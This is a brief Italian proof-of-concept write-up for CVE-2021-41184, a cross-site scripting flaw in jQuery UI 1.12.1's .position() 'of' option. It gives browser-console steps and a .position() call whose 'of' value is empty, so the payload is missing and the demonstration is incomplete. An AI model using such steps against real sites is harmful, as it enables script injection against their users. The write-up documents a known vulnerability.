
Proof-of-concept exploit per CVE-2021-41184, una vulnerabilità di cross-site scripting (XSS) nell'utilità .position() di jQuery UI, per la versione 1.12.1.
Exploit Medium CVE-2021-41184 XSS nell'opzione of dell'utilità .position()
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------Prova di concetto---------------------------------------------------------------
Apri l'URL
Apri Inspect
Cerca un ID negli elementi del sito
3.1 #ID
Vai alla scheda Console
Inietta lo script con l'ID selezionato al punto 3.1
5.1 Script
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});